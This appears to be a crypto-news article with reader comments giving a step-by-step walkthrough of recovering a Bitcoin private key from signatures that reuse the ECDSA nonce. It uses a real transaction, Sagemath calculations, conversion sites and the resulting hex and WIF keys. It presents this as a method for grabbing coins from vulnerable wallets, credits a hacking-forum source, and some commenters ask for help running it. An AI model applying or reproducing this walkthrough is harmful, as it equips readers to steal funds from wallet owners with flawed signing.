**We get it:** Ads are not what you are here for. But ads help us keep the lights on. So, add us to your adblock's whitelist or register for free to remove this notice. Either way, you are supporting our journalism. We'd really appreciate it.

Last month, hackers managed to steal more than 7,000 bitcoin from crypto exchange Binance, the world’s largest by volume. This week we got to know about an old bitcoin exploit that could target certain wallets if used correctly. The only problem is that not many bitcoin companies/wallets will re-use values these days when signing transactions, but people who are creating new copies of old coins and wallets generally don’t know about this.

Credits to Kill Joy (member on Hack Forums) for making this method public in his blog post.

“A lot of Russian bitcoin hackers have coded bots to automatically grab coins from vulnerable addresses” – Kill Joy, in his blog post.

The method uses transactions with a broken random number generator (string). These addresses re-use certain values in a transaction due to poor knowledge, programming errors, or a broken random number generator.

If you take a look at this transaction: https://blockchain.info/tx/9ec4bc49e828d…0e3b29c4b1

There are two inputs and one output in this script. Inputs are pointers to outputs of previous transactions. Outputs are, at the basic, an amount and an address.

Taking a closer look at the inputs of these scripts we notice that they are similar.

1.

`ScriptSig: PUSHDATA(71)[30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e01] PUSHDATA(65)[04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff]`

2.

`ScriptSig: PUSHDATA(71)[30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab01] PUSHDATA(65)[04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff]`

The beginning of the scripts contain the signatures (defined as ‘r’ and ‘s’). The end of the script is the hex public key.

So we have:

```
r1: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
r2: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
s1: 44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2: 9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
```

It turns out that the r values in the scripts are exactly the same. This means we can derive the private key.

`Bitcoin Private Key = (z1*s2 - z2*s1)/(r*(s1-s2))`

We have the r and s values, now we need to find the z1 and z2 values. For that navigate to: https://2coin.org/

Enter in our transaction ID: 9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1

Scroll down to find the z values.

We find:

```
z1 = c0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2 = 17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
```

Bitcoin uses an elliptical curve for generating public keys. The order of the curve is secp256k1.

```
p = parameter for the secp256k1 curve. So
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
```

We will need to create a finite field for the calculation.

`K = GF(p)`

Now that we have all the information we need, we can run our calculations.

We’ll use Sagemath: http://www.sagemath.org/

I will be using the cloud version. Make sure you input all of our equations:

```
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
r = 0xd47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
s1 = 0x44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2 = 0x9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
z1 = 0xc0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2 = 0x17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
K = GF(p)
K((z1*s2 - z2*s1)/(r*(s1-s2)))
```

Click run:

The calculation outputs: 88865298299719117682218467295833367085649033095698151055007620974294165995414

Now we will convert it from decimal to hex. You can do so here: https://www.rapidtables.com/convert/numb…o-hex.html

Our private key in hex is: C477F9F65C22CCE20657FAA5B2D1D8122336F851A508A1ED04E479C34985BF96

From here we can convert it to a WIF (wallet import format). This represents the private key!

```
A WIF private key is a standard private key, but with a few added extras:
1. Version Byte prefix - Indicates which network the private key is to be used on.
0x80 = Mainnet
0xEF = Testnet
2. Compression Byte suffix (optional) - Indicates if the private key is used to create a compressed public key.
0x01
3. Checksum - Useful for detecting errors/typos when you type out your private key.
```

Go here: https://2coin.org/privateKeyToAddress.html

Enter in our hex private key.

Our private key in WIF is: 5KJp7KEffR7HHFWSFYjiCUAntRSTY69LAQEX1AUzaSBHHFdKEpQ

Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.

Hi, if the input is only one, how am i going to do it.

Hello!

Just because this method exists doesn’t mean it will work with every single wallet. 🙂

Oh! Ok, thanks.

is this working?

Yes, it is.

Hello brother

Can you extract the private key for me?

Because I can’t find the raw transaction untill I can find the values of r, s

Prefer this my wallet address: 3DnHu2NHD22gY3eTDinXs4fJgegQLFSgpH

You can take any amount you want just help me take out the private key

and I will be thank you very much

It has no balance. Plus it is illegal. 🙂

how to find raw transaction

Hello can you tell me please how to extract raw transaction from transaction ID

You didi not explain this part of the tutorial:

Bitcoin uses an elliptical curve for generating public keys. The order of the curve is secp256k1.

p = parameter for the secp256k1 curve. So

p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

How is the ‘P’ parameter gotten?

Any reply please I just wanna know how to extract raw transaction from transaction ID

Cant find z1 and z2 from https://2coin.org/

Its showing blank after entering transaction ID